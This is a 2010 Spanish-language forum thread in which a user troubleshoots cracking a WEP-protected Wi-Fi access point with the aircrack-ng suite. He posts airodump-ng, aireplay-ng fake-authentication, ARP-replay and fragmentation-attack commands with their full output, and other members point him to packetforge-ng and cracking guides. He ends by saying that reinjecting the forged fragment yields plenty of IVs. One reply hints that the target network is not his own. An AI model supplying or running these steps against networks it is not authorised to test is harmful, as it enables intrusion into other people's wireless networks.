NO consigo paquetes IV con aircrak suite!

Iniciado por Debci, 30 Junio 2010, 13:33 PM

0 Miembros y 1 Visitante están viendo este tema.

Debci

 >:(

Que mosqueo llevo encima, algunos AP soy capaz de crackearlos, a veces se puede  avaces no, con el mismo AP, otras ni siquiera capturo datas....
Que decir...
Tras pelearme con mi tester y conseguir hacerlo tras un rato de pruebas, me dispongo a intentarlo con otro AP:

airodump-ng -w wep -c 1 --bssid 00:22:______ mon0

CH  1 ][ Elapsed: 21 mins ][ 2010-06-30 13:24 ][ fixed channel mon0: 11

BSSID              PWR RXQ  Beacons    #Data, #/s  CH  MB   ENC  CIPHER AUTH ESSID

00:22:_________  -58 100    12748     1824    0   1  54e. WEP  WEP    OPN  WLAN25D518

BSSID              STATION            PWR   Rate    Lost  Packets  Probes


Caputar datas de vez en cuando, pero no es viable tardaria mucho tiempo asi :S

aireplay-ng -1 0 -a 00:22_______ mon0
No source MAC (-h) specified. Using the device MAC (00:08:________________)
12:51:02  Waiting for beacon frame (BSSID: 00:22:____________) on channel 11

12:51:02  Sending Authentication Request (Open System) [ACK]
12:51:02  Authentication successful
12:51:02  Sending Association Request [ACK]
12:51:02  Association successful :-) (AID: 1)


Y supuestamente ya estoy asociado, ahora a inyectar trafico no?

aireplay-ng -3 -b 00:22:____________ mon0

No source MAC (-h) specified. Using the device MAC (00:08______________)
13:06:37  Waiting for beacon frame (BSSID: 00:22:________________) on channel 1
Saving ARP requests in replay_arp-0630-130637.cap
You should also start airodump-ng to capture replies.
14303 packets (got 0 ARP requests and 134 ACKs), sent 0 packets...(0 pps)


Y por mas que espero no suben los datas, en algunos AP suben, pero esperando, a veces al instante, otras tengo que hacer cosas con el ataque fragmentation, o me da la sensacion de que se arregla con eso, pero no actua igual en todos los ap.

Alguna idea?
Si me podeis decir que pauta a seguri, porque no se si lo estoy haciendo bien, y mirad que he leido y leido que no veas, y nada, tan facil que dicen todos que es...

Saludos

pazienzia

Hola.

Lo primero, no pomgas datos reales, no se puede.

Lo segundo, las ordenes las pones a medias.

Lo tercero, si los datas suben solos, aun siendo pocos, ¿no habrá un cliente legitimo?

Lo cuarto, si asistiere cliente legitimo, usa a ese cliente.

Lo quinto, ¡esa red se supone que sera tuya!

Lo sexto, ya cierro el pico.  >:D

:rolleyes:

Salu2 y userte

Nuestro equipo solo necesita llegar hasta el punto de acceso más lejano que nos llegue con calidad suficiente (no confundir calidad con señal).
Piénsalo, ¿Realmente necesitas esa cantidad de milivatios?

Debci

A que te refieres con ordenes a medias?

Lo segundo, si hubiese un cliente asociado que le hago para inyectar trafico? Osea, se mas o menos lo que hay que hacer si no hay, me hago una falsa auth y inyecto conmigo mismo, pero aun asi muchas veces o casi nunca no funciona :S
Que hago si hay clientes asociados en ese AP?

Por cierto he probado el ataque de fragmentación que chimoc me ha recomendado, y ocurre lo siguiente:

aireplay-ng -5 -b 00:22:____________ -h 00:08:____________ mon0



For information, no action required: Using gettimeofday() instead of /dev/rtc
13:23:06  Waiting for beacon frame (BSSID: 00:22:_____________) on channel 1
13:23:06  Waiting for a data packet...
Read 46 packets...

        Size: 280, FromDS: 1, ToDS: 0 (WEP)

              BSSID  =  00:22:_____________
          Dest. MAC  =  FF:FF:__________
         Source MAC  =  00:22:___________

        0x0000:  0842 0000 ffff ffff ffff 0022 2d__________  .B........."-.].
        0x0010:  0022 2d02 5dfc b050 2e76 0f00 aaaa 0300  ."-.]..P.v......
        0x0020:  0000 0800 4500 00f0 fe68 0000 4011 f543  ....E....h..@..C
        0x0030:  c0a8 0201 c0a8 02ff 008a 008a 00dc cbe7  ................
        0x0040:  1102 0f1f c0a8 0201 008a 00c6 0000 2046  .............. F
        0x0050:  4146 4345 4a45 4f46 4545 4646 4346 4443  AFCEJEOFEEFFCFDC
        0x0060:  4143 4143 4143 4143 4143 4143 4141 4100  ACACACACACACAAA.
        0x0070:  2046 4146 4343 4e45 4846 4345 5046 4646   FAFCCNEHFCEPFFF
        0x0080:  4143 4143 4143 4143 4143 4143 4143 4142  ACACACACACACACAB
        0x0090:  4e00 ff53 4d42 2500 0000 0000 0000 0000  N..SMB%.........
        0x00a0:  0000 0000 0000 0000 0000 0000 0000 0000  ................
        0x00b0:  0000 1100 002c 0000 0000 0000 0000 0000  .....,..........
        0x00c0:  0000 0000 0000 0000 002c 0056 0003 0001  .........,.V....
        0x00d0:  0001 0002 003d 005c 4d41 494c 534c 4f54  .....=.\MAILSLOT
        --- CUT ---

Use this packet ? yes

Saving chosen packet in replay_src-0630-132311.cap
13:24:35  Data packet found!
13:24:35  Sending fragmented packet
13:24:35  Got RELAYED packet!!
13:24:35  Trying to get 384 bytes of a keystream
13:24:35  Got RELAYED packet!!
13:24:35  Trying to get 1500 bytes of a keystream
13:24:35  Got RELAYED packet!!
Saving keystream in fragment-0630-132435.xor
Now you can build a packet with packetforge-ng out of that 1500 bytes keystream


Y nada mas, y no veo su utilidad.

Gracias por vuestra ayuda.

ChimoC

Buenas:

Lee y entiende esto https://foro.elhacker.net/wireless_en_linux/guia_completa_aircrackng-t231434.0.html  y esto https://foro.elhacker.net/wireless_en_linux/manual_wifislax_wifiway_avanzado_wep_y_wpa_rockeropasiempre_heavyloto_y_zydas-t261907.0.html

En cuanto al de fragmentación --> Saving keystream in fragment-0630-132435.xor
Now you can build a packet with packetforge-ng out of that 1500 bytes keystream Con eso ya tienes MUCHO  ;)   

En cuanto a que no veas su utilidad... es como todo... te falta aprenderte cómo funcionan y para qué sirve cada ataque (y cómo se hace)

Un saludo

ChimoC

P.D.: Por favor, cambia el título...sino mañana te cerraré el post

Debci

Cita de: ChimoC en 30 Junio 2010, 15:31 PM
Buenas:

Lee y entiende esto https://foro.elhacker.net/wireless_en_linux/guia_completa_aircrackng-t231434.0.html  y esto https://foro.elhacker.net/wireless_en_linux/manual_wifislax_wifiway_avanzado_wep_y_wpa_rockeropasiempre_heavyloto_y_zydas-t261907.0.html

En cuanto al de fragmentación --> Saving keystream in fragment-0630-132435.xor
Now you can build a packet with packetforge-ng out of that 1500 bytes keystream Con eso ya tienes MUCHO  ;)   

En cuanto a que no veas su utilidad... es como todo... te falta aprenderte cómo funcionan y para qué sirve cada ataque (y cómo se hace)

Un saludo

ChimoC

P.D.: Por favor, cambia el título...sino mañana te cerraré el post
Y como lo hago?
Porque ejecuto dicho comando y ahi me quedo :S
Saludos

pianista

Sigue la guia donde viene explicado como funciona el ataque de fragmentación...

Lo puedes hacer con el comando packetforge-ng, aunque también se podían crear con algun que otro programa...

Saludos

Debci

#6
Cita de: pianista en 30 Junio 2010, 16:35 PM
Sigue la guia donde viene explicado como funciona el ataque de fragmentación...

Lo puedes hacer con el comando packetforge-ng, aunque también se podían crear con algun que otro programa...

Saludos
Pero que parametros les indico al packetforge? ademas que conseguiria con eso?

Conseguido, lo que hago es re-inyectar el fragmento que he recojido.
Es eso no? Consigo IV´s a montones.
Solo que no se porque a veces con otro AP no necesito hacer eso, me suben solas, pero si hago eso consigo siempre subir las IV´s?

Saludos

pianista

Si te lees la guia y la buscas, con packetforge generarás un .cap que sirve para reinyectar (vamos como si estuvieras inyectando arps)...
Para uso del packetforge:
man packetforge-ng

Para como hacer un afrag, busca porque está publicado...

Saludos

Debci

Cita de: pianista en 30 Junio 2010, 17:00 PM
Si te lees la guia y la buscas, con packetforge generarás un .cap que sirve para reinyectar (vamos como si estuvieras inyectando arps)...
Para uso del packetforge:
man packetforge-ng

Para como hacer un afrag, busca porque está publicado...

Saludos
Ya, ya está.

Saludos y gracias